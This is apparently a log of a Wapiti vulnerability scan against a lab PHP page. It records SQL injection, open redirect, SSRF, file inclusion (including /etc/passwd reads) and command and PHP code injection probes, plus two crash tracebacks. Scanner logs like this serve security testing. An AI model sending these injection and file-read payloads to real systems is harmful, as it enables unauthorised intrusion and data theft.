2024-03-20 16:56:28.901 | VERBOSE  | wapitiCore.net.explorer:_async_analyze:286 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.027 | GREEN    | wapitiCore.controller.wapiti:save_scan_state:359 - [*] Saving scan state, please wait...
2024-03-20 16:56:29.027 | INFO     | wapitiCore.controller.wapiti:save_scan_state:363 - This scan has been saved in the file /home/wapiti/.wapiti/scans/web_folder_2bc2abbc.db
2024-03-20 16:56:29.031 | INFO     | wapitiCore.main.wapiti:wapiti_main:380 - [*] Wapiti found 1 URLs and forms during the scan
2024-03-20 16:56:29.061 | INFO     | wapitiCore.controller.wapiti:_load_attack_modules:289 - [*] Existing modules:
2024-03-20 16:56:29.061 | INFO     | wapitiCore.controller.wapiti:_load_attack_modules:290 - 	 backup, brute_login_form, buster, cookieflags, crlf, csp, csrf, drupal_enum, exec, file, htaccess, htp, http_headers, https_redirect, log4shell, methods, nikto, permanentxss, redirect, shellshock, spring4shell, sql, ssl, ssrf, takeover, timesql, upload, wapp, wp_enum, xss, xxe
2024-03-20 16:56:29.157 | ERROR    | wapitiCore.controller.wapiti:_load_attack_modules:298 - [!] Unable to import module ssl: No module named 'humanize'
2024-03-20 16:56:29.172 | ERROR    | wapitiCore.controller.wapiti:filter_modules_with_options:130 - [!] Unable to find a module named ssl
2024-03-20 16:56:29.173 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module sql
2024-03-20 16:56:29.186 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.186 | VERBOSE  | wapitiCore.attack.mod_sql:error_based_attack:368 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%C2%BF%27%22%28 (0)
2024-03-20 16:56:29.208 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%20AND%2052%3D69%20AND%2082%3D82 (0)
2024-03-20 16:56:29.219 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%20AND%2019%3D32%20AND%2010%3D10 (0)
2024-03-20 16:56:29.229 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%20AND%2044%3D44%20AND%2095%3D95 (0)
2024-03-20 16:56:29.239 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%20AND%2038%3D137%20AND%20%2783%27%3D%2783 (0)
2024-03-20 16:56:29.250 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%20AND%2093%3D150%20AND%20%2768%27%3D%2768 (0)
2024-03-20 16:56:29.259 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%20AND%2076%3D76%20AND%20%2796%27%3D%2796 (0)
2024-03-20 16:56:29.269 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%20AND%2026%3D71%20AND%20%2215%22%3D%2215 (0)
2024-03-20 16:56:29.281 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%20AND%2062%3D134%20AND%20%2288%22%3D%2288 (0)
2024-03-20 16:56:29.290 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%20AND%2072%3D72%20AND%20%2299%22%3D%2299 (0)
2024-03-20 16:56:29.301 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%29%20AND%2024%3D41%20AND%20%2818%3D18 (0)
2024-03-20 16:56:29.310 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%29%20AND%2091%3D188%20AND%20%2875%3D75 (0)
2024-03-20 16:56:29.321 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%29%20AND%2092%3D92%20AND%20%2857%3D57 (0)
2024-03-20 16:56:29.331 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%29%20AND%2018%3D91%20AND%20%28%2723%27%3D%2723 (0)
2024-03-20 16:56:29.341 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%29%20AND%2018%3D103%20AND%20%28%2712%27%3D%2712 (0)
2024-03-20 16:56:29.350 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%27%29%20AND%2088%3D88%20AND%20%28%2714%27%3D%2714 (0)
2024-03-20 16:56:29.360 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%29%20AND%2046%3D97%20AND%20%28%2223%22%3D%2223 (0)
2024-03-20 16:56:29.370 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%29%20AND%2038%3D104%20AND%20%28%2290%22%3D%2290 (0)
2024-03-20 16:56:29.376 | VERBOSE  | wapitiCore.attack.mod_sql:boolean_based_attack:517 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%22%29%20AND%2022%3D22%20AND%20%28%2213%22%3D%2213 (0)
2024-03-20 16:56:29.408 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module upload
2024-03-20 16:56:29.437 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module cookieflags
2024-03-20 16:56:29.451 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.451 | BLUE     | wapitiCore.attack.mod_cookieflags:attack:55 - Checking cookie : PHPSESSID
2024-03-20 16:56:29.451 | RED      | wapitiCore.attack.mod_cookieflags:attack:57 - HttpOnly flag is not set in the cookie : PHPSESSID
2024-03-20 16:56:29.498 | RED      | wapitiCore.attack.mod_cookieflags:attack:66 - Secure flag is not set in the cookie : PHPSESSID
2024-03-20 16:56:29.558 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module csp
2024-03-20 16:56:29.572 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.581 | RED      | wapitiCore.attack.mod_csp:attack:58 - CSP is not set
2024-03-20 16:56:29.655 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module redirect
2024-03-20 16:56:29.669 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.669 | VERBOSE  | wapitiCore.attack.mod_redirect:attack:53 - [¨] http://web/unvalidated_redir_fwd_2.php?ReturnUrl=https%3A%2F%2Fopenbugbounty.org%2F
2024-03-20 16:56:29.733 | RED      | wapitiCore.attack.mod_redirect:attack:79 - ---
2024-03-20 16:56:29.733 | RED      | wapitiCore.attack.mod_redirect:attack:80 - Open Redirect in http://web/unvalidated_redir_fwd_2.php via injection in the query string
2024-03-20 16:56:29.733 | RED      | wapitiCore.attack.mod_redirect:attack:86 - Evil request:
2024-03-20 16:56:29.733 | RED      | wapitiCore.attack.mod_redirect:attack:87 -     GET /unvalidated_redir_fwd_2.php?ReturnUrl=https%3A%2F%2Fopenbugbounty.org%2F HTTP/1.1
    host: web
    connection: keep-alive
    user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
    accept-language: en-US
    accept-encoding: gzip, deflate, br
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    cookie: security_level=0
2024-03-20 16:56:29.733 | RED      | wapitiCore.attack.mod_redirect:attack:88 - ---
2024-03-20 16:56:29.734 | VERBOSE  | wapitiCore.attack.mod_redirect:attack:53 - [¨] http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2F%2Fopenbugbounty.org%2F
2024-03-20 16:56:29.794 | RED      | wapitiCore.attack.mod_redirect:attack:79 - ---
2024-03-20 16:56:29.794 | RED      | wapitiCore.attack.mod_redirect:attack:80 - Open Redirect in http://web/unvalidated_redir_fwd_2.php via injection in the query string
2024-03-20 16:56:29.794 | RED      | wapitiCore.attack.mod_redirect:attack:86 - Evil request:
2024-03-20 16:56:29.795 | RED      | wapitiCore.attack.mod_redirect:attack:87 -     GET /unvalidated_redir_fwd_2.php?ReturnUrl=%2F%2Fopenbugbounty.org%2F HTTP/1.1
    host: web
    connection: keep-alive
    user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
    accept-language: en-US
    accept-encoding: gzip, deflate, br
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    cookie: security_level=0
2024-03-20 16:56:29.795 | RED      | wapitiCore.attack.mod_redirect:attack:88 - ---
2024-03-20 16:56:29.810 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module ssrf
2024-03-20 16:56:29.823 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:29.823 | VERBOSE  | wapitiCore.attack.mod_ssrf:attack:175 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=https%3A%2F%2Fwapiti3.ovh%2Fssrf%2Fibxa92%2F1%2F52657475726e55726c%2F (0)
2024-03-20 16:56:29.845 | INFO     | wapitiCore.attack.mod_ssrf:finish:185 - [*] Asking endpoint URL https://wapiti3.ovh/get_ssrf.php?session_id=ibxa92 for results, please wait...
2024-03-20 16:56:32.079 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module file
2024-03-20 16:56:32.090 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:32.093 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=https%3A%2F%2Fwapiti3.ovh%2F%2Fe.php (0)
2024-03-20 16:56:32.099 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=https%3A%2F%2Fwapiti3.ovh%2F%2Fe.php%00 (0)
2024-03-20 16:56:32.105 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2Fetc%2Fpasswd (0)
2024-03-20 16:56:32.111 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2Fetc%2Fpasswd%00 (0)
2024-03-20 16:56:32.117 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2Fetc%2Fservices (0)
2024-03-20 16:56:32.123 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2Fetc%2Fservices%00 (0)
2024-03-20 16:56:32.130 | VERBOSE  | wapitiCore.attack.mod_file:attack:163 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices (0)
2024-03-20 16:56:32.135 | ERROR    | wapitiCore.controller.wapiti:attack:520 - InvalidURL
Traceback (most recent call last):

  File "/usr/local/bin/wapiti", line 8, in <module>
    sys.exit(wapiti_asyncio_wrapper())
    │   │    └ <function wapiti_asyncio_wrapper at 0x76d416198900>
    │   └ <built-in function exit>
    └ <module 'sys' (built-in)>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti.py", line 395, in wapiti_asyncio_wrapper
    asyncio.run(wapiti_main())
    │       │   └ <function wapiti_main at 0x76d416198860>
    │       └ <function run at 0x76d41aebb560>
    └ <module 'asyncio' from '/usr/local/lib/python3.11/asyncio/__init__.py'>
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           │      │   └ <coroutine object wapiti_main at 0x76d4163cb240>
           │      └ <function Runner.run at 0x76d41ad46fc0>
           └ <asyncio.runners.Runner object at 0x76d41a13cc90>
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           │    │     │                  └ <Task cancelling name='Task-1' coro=<wapiti_main() running at /usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti....
           │    │     └ <function BaseEventLoop.run_until_complete at 0x76d41ad44c20>
           │    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
           └ <asyncio.runners.Runner object at 0x76d41a13cc90>
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 641, in run_until_complete
    self.run_forever()
    │    └ <function BaseEventLoop.run_forever at 0x76d41ad44b80>
    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 608, in run_forever
    self._run_once()
    │    └ <function BaseEventLoop._run_once at 0x76d41ad46980>
    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
  File "/usr/local/lib/python3.11/asyncio/base_events.py", line 1936, in _run_once
    handle._run()
    │      └ <function Handle._run at 0x76d41aea4e00>
    └ <Handle <TaskStepMethWrapper object at 0x76d4153995a0>()>
  File "/usr/local/lib/python3.11/asyncio/events.py", line 84, in _run
    self._context.run(self._callback, *self._args)
    │    │            │    │           │    └ <member '_args' of 'Handle' objects>
    │    │            │    │           └ <Handle <TaskStepMethWrapper object at 0x76d4153995a0>()>
    │    │            │    └ <member '_callback' of 'Handle' objects>
    │    │            └ <Handle <TaskStepMethWrapper object at 0x76d4153995a0>()>
    │    └ <member '_context' of 'Handle' objects>
    └ <Handle <TaskStepMethWrapper object at 0x76d4153995a0>()>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti.py", line 382, in wapiti_main
    await wap.attack(global_stop_event)
          │   │      └ <asyncio.locks.Event object at 0x76d41b52f250 [unset]>
          │   └ <function Wapiti.attack at 0x76d41620e520>
          └ <wapitiCore.controller.wapiti.Wapiti object at 0x76d416493210>
> File "/usr/local/lib/python3.11/site-packages/wapitiCore/controller/wapiti.py", line 503, in attack
    await attack_module.attack(original_request, original_response)
          │             │      │                 └ <wapitiCore.net.response.Response object at 0x76d4154f1210>
          │             │      └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
          │             └ <function ModuleFile.attack at 0x76d4154459e0>
          └ <wapitiCore.attack.mod_file.ModuleFile object at 0x76d415fdba10>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/attack/mod_file.py", line 166, in attack
    response = await self.crawler.async_send(mutated_request)
                     │    │       │          └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices (0)
                     │    │       └ <function AsyncCrawler.async_send at 0x76d419ba6020>
                     │    └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
                     └ <wapitiCore.attack.mod_file.ModuleFile object at 0x76d415fdba10>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 386, in async_send
    response = await self.async_get(request, headers=headers,
                     │    │         │                └ None
                     │    │         └ GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices (0)
                     │    └ <function AsyncCrawler.async_get at 0x76d419ba6160>
                     └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 59, in inner_wrapper
    value = await function(*args, **kwargs)
                  │         │       └ {'headers': None, 'follow_redirects': False, 'stream': False, 'timeout': None}
                  │         └ (<wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>, GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5C...
                  └ <function AsyncCrawler.async_get at 0x76d419ba60c0>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/net/crawler.py", line 238, in async_get
    response = await self._client.send(
                     │    │       └ <function AsyncClient.send at 0x76d41a10d1c0>
                     │    └ <httpx.AsyncClient object at 0x76d41725c410>
                     └ <wapitiCore.net.crawler.AsyncCrawler object at 0x76d415fefd90>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1617, in send
    response = await self._send_handling_auth(
                     │    └ <function AsyncClient._send_handling_auth at 0x76d41a10d260>
                     └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1645, in _send_handling_auth
    response = await self._send_handling_redirects(
                     │    └ <function AsyncClient._send_handling_redirects at 0x76d41a10d300>
                     └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1703, in _send_handling_redirects
    raise exc
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 1692, in _send_handling_redirects
    request = self._build_redirect_request(request, response)
              │    │                       │        └ <Response [302 Found]>
              │    │                       └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')>
              │    └ <function BaseClient._build_redirect_request at 0x76d41a0ffc40>
              └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 465, in _build_redirect_request
    url = self._redirect_url(request, response)
          │    │             │        └ <Response [302 Found]>
          │    │             └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')>
          │    └ <function BaseClient._redirect_url at 0x76d41a0ffd80>
          └ <httpx.AsyncClient object at 0x76d41725c410>
  File "/usr/local/lib/python3.11/site-packages/httpx/_client.py", line 517, in _redirect_url
    url = url.copy_with(host=request.url.host)
          │   │              │       │   └ <property object at 0x76d41a80df80>
          │   │              │       └ URL('http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')
          │   │              └ <Request('GET', 'http://web/unvalidated_redir_fwd_2.php?ReturnUrl=C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')>
          │   └ <function URL.copy_with at 0x76d41a81d8a0>
          └ URL('c:%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')
  File "/usr/local/lib/python3.11/site-packages/httpx/_urls.py", line 348, in copy_with
    return URL(self, **kwargs)
           │   │       └ {'host': 'web'}
           │   └ URL('c:%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')
           └ <class 'httpx.URL'>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urls.py", line 115, in __init__
    self._uri_reference = url._uri_reference.copy_with(**kwargs)
    │                     │   │              │           └ {'host': 'web'}
    │                     │   │              └ <function ParseResult.copy_with at 0x76d41a81c400>
    │                     │   └ ParseResult(scheme='c', userinfo='', host='', port=None, path='%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices', query=None,...
    │                     └ URL('c:%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices')
    └ <unprintable URL object>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 134, in copy_with
    return urlparse("", **defaults)
           │              └ {'scheme': 'c', 'authority': '', 'path': '%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices', 'query': None, 'fragment': None,...
           └ <function urlparse at 0x76d41a81c220>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 252, in urlparse
    validate_path(path, has_scheme=has_scheme, has_authority=has_authority)
    │             │                │                         └ True
    │             │                └ True
    │             └ '%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Cservices'
    └ <function validate_path at 0x76d41a81ca40>
  File "/usr/local/lib/python3.11/site-packages/httpx/_urlparse.py", line 369, in validate_path
    raise InvalidURL("For absolute URLs, path must be empty or begin with '/'")
          └ <class 'httpx.InvalidURL'>

httpx.InvalidURL: For absolute URLs, path must be empty or begin with '/'
2024-03-20 16:56:32.171 | INFO     | wapitiCore.controller.wapiti:send_bug_report:616 - Wapiti 3.1.8. httpx 0.24.1. OS linux
2024-03-20 16:56:32.258 | SUCCESS  | wapitiCore.controller.wapiti:send_bug_report:627 - Sending crash report cd995618-e6da-11ee-bf5a-0242ac160004 ... SUCCESS
2024-03-20 16:56:32.262 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module xss
2024-03-20 16:56:32.273 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:32.302 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module http_headers
2024-03-20 16:56:32.319 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:32.325 | BLUE     | wapitiCore.attack.mod_http_headers:check_header:83 - Checking X-Frame-Options:
2024-03-20 16:56:32.325 | RED      | wapitiCore.attack.mod_http_headers:check_header:85 - X-Frame-Options is not set
2024-03-20 16:56:32.380 | BLUE     | wapitiCore.attack.mod_http_headers:check_header:83 - Checking X-Content-Type-Options:
2024-03-20 16:56:32.380 | RED      | wapitiCore.attack.mod_http_headers:check_header:85 - X-Content-Type-Options is not set
2024-03-20 16:56:32.457 | GREEN    | wapitiCore.controller.wapiti:attack:459 - [*] Launching module exec
2024-03-20 16:56:32.470 | INFO     | wapitiCore.controller.wapiti:attack:501 - [+] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz (0)
2024-03-20 16:56:32.474 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%3Benv%3B (0)
2024-03-20 16:56:32.541 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%7Cenv%7C (0)
2024-03-20 16:56:32.548 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=a%3Benv%3B (0)
2024-03-20 16:56:32.556 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=a%3Benv%3B (0)
2024-03-20 16:56:32.563 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fbin%2Fenv%7C (0)
2024-03-20 16:56:32.571 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%3Benv%3B (0)
2024-03-20 16:56:32.580 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=fuzz%0Aenv%3B (0)
2024-03-20 16:56:32.592 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%26set%26 (0)
2024-03-20 16:56:32.601 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=set (0)
2024-03-20 16:56:32.608 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=env (0)
2024-03-20 16:56:32.617 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%2Fe%00 (0)
2024-03-20 16:56:32.624 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=a%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.632 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=a%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.641 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%22%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.649 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%22%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.660 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%27%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.671 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%27%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.683 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%22.exit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.694 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%22.exit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.706 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%27.exit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.717 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%27.exit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.724 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%2F%2F (0)
2024-03-20 16:56:32.732 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=%3Bexit%28md5%28%27w4p1t1_md5%27%29%29%3B%23 (0)
2024-03-20 16:56:32.739 | VERBOSE  | wapitiCore.attack.mod_exec:attack:98 - [¨] GET http://web/unvalidated_redir_fwd_2.php?ReturnUrl=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D (0)
2024-03-20 16:56:32.750 | ERROR    | wapitiCore.controller.wapiti:attack:520 - InvalidURL
Traceback (most recent call last):

  File "/usr/local/bin/wapiti", line 8, in <module>
    sys.exit(wapiti_asyncio_wrapper())
    │   │    └ <function wapiti_asyncio_wrapper at 0x76d416198900>
    │   └ <built-in function exit>
    └ <module 'sys' (built-in)>
  File "/usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti.py", line 395, in wapiti_asyncio_wrapper
    asyncio.run(wapiti_main())
    │       │   └ <function wapiti_main at 0x76d416198860>
    │       └ <function run at 0x76d41aebb560>
    └ <module 'asyncio' from '/usr/local/lib/python3.11/asyncio/__init__.py'>
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           │      │   └ <coroutine object wapiti_main at 0x76d4163cb240>
           │      └ <function Runner.run at 0x76d41ad46fc0>
           └ <asyncio.runners.Runner object at 0x76d41a13cc90>
  File "/usr/local/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           │    │     │                  └ <Task cancelling name='Task-1' coro=<wapiti_main() running at /usr/local/lib/python3.11/site-packages/wapitiCore/main/wapiti....
           │    │     └ <function BaseEventLoop.run_until_complete at 0x76d41ad44c20>
           │    └ <_UnixSelectorEventLoop running=True closed=False debug=False>
           └ <asyncio.runners.Runner object at 0x76d41a13cc90>
